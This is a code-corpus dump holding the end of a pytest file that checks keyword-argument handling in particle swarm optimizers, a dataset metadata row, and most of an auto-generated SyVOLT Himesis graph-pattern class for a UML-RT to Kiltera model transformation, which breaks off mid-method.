opt_ps = GlobalBestPSO(n_particles=100, dimensions=2, options=options, bounds=bounds)
# run it
cost, pos = opt_ps.optimize(func, 1000, print_step=10, verbose=3)
assert np.isclose(cost, 0, rtol=1e-03)
assert np.isclose(pos[0], 1.0, rtol=1e-03)
assert np.isclose(pos[1], 1.0, rtol=1e-03)
@pytest.mark.parametrize('func', [
rosenbrock_with_args
])
def test_local_kwargs(func):
"""Tests if kwargs are passed properly to the objective function for when kwargs are present"""
# setup optimizer
options = {'c1': 0.5, 'c2': 0.3, 'w': 0.9, 'k': 2, 'p': 2}
x_max = 10 * np.ones(2)
x_min = -1 * x_max
bounds = (x_min, x_max)
opt_ps = LocalBestPSO(n_particles=100, dimensions=2, options=options, bounds=bounds)
# run it
cost, pos = opt_ps.optimize(func, 1000, print_step=10, verbose=3, a=1, b=100)
assert np.isclose(cost, 0, rtol=1e-03)
assert np.isclose(pos[0], 1.0, rtol=1e-03)
assert np.isclose(pos[1], 1.0, rtol=1e-03)
@pytest.mark.parametrize('func', [
rosenbrock_func
])
def test_local_no_kwargs(func):
"""Tests if no kwargs/args are passed properly to the objective function for when kwargs are present"""
# setup optimizer
options = {'c1': 0.5, 'c2': 0.3, 'w': 0.9, 'k': 2, 'p': 2}
x_max = 10 * np.ones(2)
x_min = -1 * x_max
bounds = (x_min, x_max)
opt_ps = LocalBestPSO(n_particles=100, dimensions=2, options=options, bounds=bounds)
# run it
cost, pos = opt_ps.optimize(func, iters=1000, print_step=10, verbose=3)
assert np.isclose(cost, 0, rtol=1e-03)
assert np.isclose(pos[0], 1.0, rtol=1e-03)
assert np.isclose(pos[1], 1.0, rtol=1e-03)
@pytest.mark.parametrize('func', [
rosenbrock_func
])
def test_global_uneeded_kwargs(func):
"""Tests kwargs are passed the objective function for when kwargs do not exist"""
# setup optimizer
options = {'c1': 0.5, 'c2': 0.3, 'w': 0.9, 'k': 2, 'p': 2}
x_max = 10 * np.ones(2)
x_min = -1 * x_max
bounds = (x_min, x_max)
opt_ps = GlobalBestPSO(n_particles=100, dimensions=2, options=options, bounds=bounds)
# run it
with pytest.raises(TypeError) as excinfo:
cost, pos = opt_ps.optimize(func, 1000, print_step=10, verbose=3, a=1)
assert 'unexpected keyword' in str(excinfo.value)
@pytest.mark.parametrize('func', [
rosenbrock_with_args
])
def test_global_missed_kwargs(func):
"""Tests kwargs are passed the objective function for when kwargs do not exist"""
# setup optimizer
options = {'c1': 0.5, 'c2': 0.3, 'w': 0.9, 'k': 2, 'p': 2}
x_max = 10 * np.ones(2)
x_min = -1 * x_max
bounds = (x_min, x_max)
opt_ps = GlobalBestPSO(n_particles=100, dimensions=2, options=options, bounds=bounds)
# run it
with pytest.raises(TypeError) as excinfo:
cost, pos = opt_ps.optimize(func, 1000, print_step=10, verbose=3, a=1)
assert 'missing 1 required positional argument' in str(excinfo.value)
@pytest.mark.parametrize('func', [
rosenbrock_func
])
def test_local_uneeded_kwargs(func):
"""Tests kwargs are passed the objective function for when kwargs do not exist"""
# setup optimizer
options = {'c1': 0.5, 'c2': 0.3, 'w': 0.9, 'k': 2, 'p': 2}
x_max = 10 * np.ones(2)
x_min = -1 * x_max
bounds = (x_min, x_max)
opt_ps = LocalBestPSO(n_particles=100, dimensions=2, options=options, bounds=bounds)
# run it
with pytest.raises(TypeError) as excinfo:
cost, pos = opt_ps.optimize(func, 1000, print_step=10, verbose=3, a=1)
assert 'unexpected keyword' in str(excinfo.value)
@pytest.mark.parametrize('func', [
rosenbrock_with_args
])
def test_local_missed_kwargs(func):
"""Tests kwargs are passed the objective function for when kwargs do not exist"""
# setup optimizer
options = {'c1': 0.5, 'c2': 0.3, 'w': 0.9, 'k': 2, 'p': 2}
x_max = 10 * np.ones(2)
x_min = -1 * x_max
bounds = (x_min, x_max)
opt_ps = LocalBestPSO(n_particles=100, dimensions=2, options=options, bounds=bounds)
# run it
with pytest.raises(TypeError) as excinfo:
cost, pos = opt_ps.optimize(func, 1000, print_step=10, verbose=3, a=1)
assert 'missing 1 required positional argument' in str(excinfo.value)
@pytest.mark.parametrize('func', [
rosenbrock_with_args
])
def test_local_wrong_kwargs(func):
"""Tests kwargs are passed the objective function for when kwargs do not exist"""
# setup optimizer
options = {'c1': 0.5, 'c2': 0.3, 'w': 0.9, 'k': 2, 'p': 2}
x_max = 10 * np.ones(2)
x_min = -1 * x_max
bounds = (x_min, x_max)
opt_ps = LocalBestPSO(n_particles=100, dimensions=2, options=options, bounds=bounds)
# run it
with pytest.raises(TypeError) as excinfo:
cost, pos = opt_ps.optimize(func, 1000, print_step=10, verbose=3, c=1, d=100)
assert 'unexpected keyword' in str(excinfo.value)
@pytest.mark.parametrize('func', [
rosenbrock_with_args
])
def test_global_wrong_kwargs(func):
"""Tests kwargs are passed the objective function for when kwargs do not exist"""
# setup optimizer
options = {'c1': 0.5, 'c2': 0.3, 'w': 0.9, 'k': 2, 'p': 2}
x_max = 10 * np.ones(2)
x_min = -1 * x_max
bounds = (x_min, x_max)
opt_ps = GlobalBestPSO(n_particles=100, dimensions=2, options=options, bounds=bounds)
# run it
with pytest.raises(TypeError) as excinfo:
cost, pos = opt_ps.optimize(func, 1000, print_step=10, verbose=3, c=1, d=100)
assert 'unexpected keyword' in str(excinfo.value)
| 31.129032 | 107 | 0.647927 | 1,248 | 7,720 | 3.884615 | 0.09375 | 0.027228 | 0.046411 | 0.027847 | 0.934406 | 0.926568 | 0.926568 | 0.926568 | 0.926568 | 0.922236 | 0 | 0.062959 | 0.205829 | 7,720 | 247 | 108 | 31.255061 | 0.727777 | 0.168912 | 0 | 0.854167 | 0 | 0 | 0.042489 | 0 | 0 | 0 | 0 | 0 | 0.145833 | 1 | 0.083333 | false | 0 | 0.027778 | 0 | 0.118056 | 0.069444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8d5f9b92c6e1157d7c301f74c3a4cee11697ae8e | 59,506 | py | Python | UMLRT2Kiltera_MM/Properties/Pattern/Himesis/HTrans2HListenBranchSIBLING_CompleteLHS.py | levilucio/SyVOLT | 7526ec794d21565e3efcc925a7b08ae8db27d46a | [
"MIT"
] | 3 | 2017-06-02T19:26:27.000Z | 2021-06-14T04:25:45.000Z | UMLRT2Kiltera_MM/Properties/Pattern/Himesis/HTrans2HListenBranchSIBLING_CompleteLHS.py | levilucio/SyVOLT | 7526ec794d21565e3efcc925a7b08ae8db27d46a | [
"MIT"
] | 8 | 2016-08-24T07:04:07.000Z | 2017-05-26T16:22:47.000Z | UMLRT2Kiltera_MM/Properties/Pattern/Himesis/HTrans2HListenBranchSIBLING_CompleteLHS.py | levilucio/SyVOLT | 7526ec794d21565e3efcc925a7b08ae8db27d46a | [
"MIT"
] | 1 | 2019-10-31T06:00:23.000Z | 2019-10-31T06:00:23.000Z |
from core.himesis import Himesis, HimesisPreConditionPatternLHS
import cPickle as pickle
from uuid import UUID
class HTrans2HListenBranchSIBLING_CompleteLHS(HimesisPreConditionPatternLHS):
def __init__(self):
"""
Creates the himesis graph representing the AToM3 model HTrans2HListenBranchSIBLING_CompleteLHS.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HTrans2HListenBranchSIBLING_CompleteLHS, self).__init__(name='HTrans2HListenBranchSIBLING_CompleteLHS', num_nodes=19, edges=[])
# Add the edges
self.add_edges([(8, 0), (0, 9), (4, 1), (1, 7), (1, 8), (2, 14), (7, 3), (9, 6), (5, 4), (14, 5), (5, 15), (5, 16), (5, 17), (5, 18), (15, 10), (16, 11), (17, 12), (18, 13)])
# Set the graph attributes
self["mm__"] = pickle.loads("""(lp1
S'MT_pre__UMLRT2Kiltera_MM'
p2
aS'MoTifRule'
p3
a.""")
self["MT_constraint__"] = pickle.loads("""V#===============================================================================\u000a# This code is executed after the nodes in the LHS have been matched.\u000a# You can access a matched node labelled n by: PreNode('n').\u000a# To access attribute x of node n, use: PreNode('n')['x'].\u000a# The given constraint must evaluate to a boolean expression:\u000a# returning True enables the rule to be applied,\u000a# returning False forbids the rule from being applied.\u000a#===============================================================================\u000a\u000areturn True\u000a
p1
.""")
self["name"] = """"""
self["GUID__"] = UUID('fe7d5c97-4631-4b05-8db8-7a0323c1e71e')
# Set the node attributes
self.vs[0]["MT_pivotOut__"] = """element3"""
self.vs[0]["MT_subtypeMatching__"] = False
self.vs[0]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[0]["MT_pivotIn__"] = """element3"""
self.vs[0]["MT_label__"] = """3"""
self.vs[0]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[0]["MT_dirty__"] = False
self.vs[0]["mm__"] = """MT_pre__Trigger_S"""
self.vs[0]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[0]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[0]["GUID__"] = UUID('8a729988-8dfb-48fd-9577-b3973d4b11b4')
self.vs[1]["MT_pivotOut__"] = """element1"""
self.vs[1]["MT_subtypeMatching__"] = False
self.vs[1]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[1]["MT_pivotIn__"] = """element1"""
self.vs[1]["MT_label__"] = """1"""
self.vs[1]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[1]["MT_dirty__"] = False
self.vs[1]["mm__"] = """MT_pre__Transition"""
self.vs[1]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[1]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[1]["GUID__"] = UUID('42482516-2829-4e3e-b173-67645ee11e5a')
self.vs[2]["MT_subtypeMatching__"] = False
self.vs[2]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[2]["MT_label__"] = """23"""
self.vs[2]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[2]["MT_dirty__"] = False
self.vs[2]["mm__"] = """MT_pre__ListenBranch"""
self.vs[2]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[2]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[2]["GUID__"] = UUID('7dff6795-8e46-46de-8d9f-566ead271d27')
self.vs[3]["MT_pivotOut__"] = """element2"""
self.vs[3]["MT_subtypeMatching__"] = False
self.vs[3]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[3]["MT_pivotIn__"] = """element2"""
self.vs[3]["MT_label__"] = """2"""
self.vs[3]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[3]["MT_dirty__"] = False
self.vs[3]["mm__"] = """MT_pre__SIBLING0"""
self.vs[3]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[3]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[3]["GUID__"] = UUID('d15b9973-9abd-4ced-96b4-39131955dff1')
self.vs[4]["MT_subtypeMatching__"] = False
self.vs[4]["MT_label__"] = """13"""
self.vs[4]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[4]["MT_dirty__"] = False
self.vs[4]["mm__"] = """MT_pre__trace_link"""
self.vs[4]["GUID__"] = UUID('2a525b7a-6860-42d4-ba9b-884e17c4c239')
self.vs[5]["MT_subtypeMatching__"] = False
self.vs[5]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[5]["MT_label__"] = """11"""
self.vs[5]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[5]["MT_dirty__"] = False
self.vs[5]["mm__"] = """MT_pre__Inst"""
self.vs[5]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[5]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[5]["GUID__"] = UUID('d2a0298c-d501-45cf-bc6d-1240a8a3bea3')
self.vs[6]["MT_pivotOut__"] = """element4"""
self.vs[6]["MT_subtypeMatching__"] = False
self.vs[6]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[6]["MT_pivotIn__"] = """element4"""
self.vs[6]["MT_label__"] = """4"""
self.vs[6]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[6]["MT_dirty__"] = False
self.vs[6]["mm__"] = """MT_pre__Signal"""
self.vs[6]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[6]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[6]["GUID__"] = UUID('291bf7bd-4454-47d7-9434-c9920c17d012')
self.vs[7]["MT_subtypeMatching__"] = False
self.vs[7]["MT_pre__associationType"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[7]["MT_label__"] = """5"""
self.vs[7]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[7]["MT_dirty__"] = False
self.vs[7]["mm__"] = """MT_pre__directLink_S"""
self.vs[7]["GUID__"] = UUID('eb9d7b36-2c60-4886-a76a-2b4306957fe6')
self.vs[8]["MT_subtypeMatching__"] = False
self.vs[8]["MT_pre__associationType"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[8]["MT_label__"] = """6"""
self.vs[8]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[8]["MT_dirty__"] = False
self.vs[8]["mm__"] = """MT_pre__directLink_S"""
self.vs[8]["GUID__"] = UUID('ab929ed1-6d54-4dc8-b712-6d5ad3322090')
self.vs[9]["MT_subtypeMatching__"] = False
self.vs[9]["MT_pre__associationType"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[9]["MT_label__"] = """7"""
self.vs[9]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[9]["MT_dirty__"] = False
self.vs[9]["mm__"] = """MT_pre__directLink_S"""
self.vs[9]["GUID__"] = UUID('de790366-3b39-4a42-b577-a421ed912188')
self.vs[10]["MT_subtypeMatching__"] = False
self.vs[10]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[10]["MT_label__"] = """25"""
self.vs[10]["MT_subtypes__"] = pickle.loads("""(lp1
S'MT_pre__PythonRef'
p2
a.""")
self.vs[10]["MT_dirty__"] = False
self.vs[10]["mm__"] = """MT_pre__Name"""
self.vs[10]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[10]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[10]["GUID__"] = UUID('88bbcaad-b5f3-4520-85bd-008fdafa6e49')
self.vs[11]["MT_subtypeMatching__"] = False
self.vs[11]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[11]["MT_label__"] = """27"""
self.vs[11]["MT_subtypes__"] = pickle.loads("""(lp1
S'MT_pre__PythonRef'
p2
a.""")
self.vs[11]["MT_dirty__"] = False
self.vs[11]["mm__"] = """MT_pre__Name"""
self.vs[11]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[11]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[11]["GUID__"] = UUID('053bde24-f14c-4ce8-ad6a-9fd618aae653')
self.vs[12]["MT_subtypeMatching__"] = False
self.vs[12]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[12]["MT_label__"] = """29"""
self.vs[12]["MT_subtypes__"] = pickle.loads("""(lp1
S'MT_pre__PythonRef'
p2
a.""")
self.vs[12]["MT_dirty__"] = False
self.vs[12]["mm__"] = """MT_pre__Name"""
self.vs[12]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[12]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[12]["GUID__"] = UUID('bf2329c7-3e1f-46f2-b3e1-7d4f229d218a')
self.vs[13]["MT_subtypeMatching__"] = False
self.vs[13]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[13]["MT_label__"] = """31"""
self.vs[13]["MT_subtypes__"] = pickle.loads("""(lp1
S'MT_pre__PythonRef'
p2
a.""")
self.vs[13]["MT_dirty__"] = False
self.vs[13]["mm__"] = """MT_pre__Name"""
self.vs[13]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[13]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[13]["GUID__"] = UUID('f47b6c4a-0e37-48ea-959c-2fc2008bbf06')
self.vs[14]["MT_subtypeMatching__"] = False
self.vs[14]["MT_pre__associationType"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[14]["MT_label__"] = """24"""
self.vs[14]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[14]["MT_dirty__"] = False
self.vs[14]["mm__"] = """MT_pre__directLink_T"""
self.vs[14]["GUID__"] = UUID('9a59513f-2400-4033-bae7-83f16a8c50fd')
self.vs[15]["MT_subtypeMatching__"] = False
self.vs[15]["MT_pre__associationType"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[15]["MT_label__"] = """26"""
self.vs[15]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[15]["MT_dirty__"] = False
self.vs[15]["mm__"] = """MT_pre__directLink_T"""
self.vs[15]["GUID__"] = UUID('e134d893-330b-44ad-9829-5e658483f20c')
self.vs[16]["MT_subtypeMatching__"] = False
self.vs[16]["MT_pre__associationType"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[16]["MT_label__"] = """28"""
self.vs[16]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[16]["MT_dirty__"] = False
self.vs[16]["mm__"] = """MT_pre__directLink_T"""
self.vs[16]["GUID__"] = UUID('2940f310-bb3c-49f3-8aae-991442d1bd72')
self.vs[17]["MT_subtypeMatching__"] = False
self.vs[17]["MT_pre__associationType"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[17]["MT_label__"] = """30"""
self.vs[17]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[17]["MT_dirty__"] = False
self.vs[17]["mm__"] = """MT_pre__directLink_T"""
self.vs[17]["GUID__"] = UUID('91300818-46bd-4a33-8d8d-a5ec524e1fc3')
self.vs[18]["MT_subtypeMatching__"] = False
self.vs[18]["MT_pre__associationType"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[18]["MT_label__"] = """32"""
self.vs[18]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[18]["MT_dirty__"] = False
self.vs[18]["mm__"] = """MT_pre__directLink_T"""
self.vs[18]["GUID__"] = UUID('0cafa617-ff30-4766-9541-721dc2ee1eaa')
def eval_classtype3(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_cardinality3(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name3(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_classtype1(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_cardinality1(self, attr_value, this):
#===============================================================================
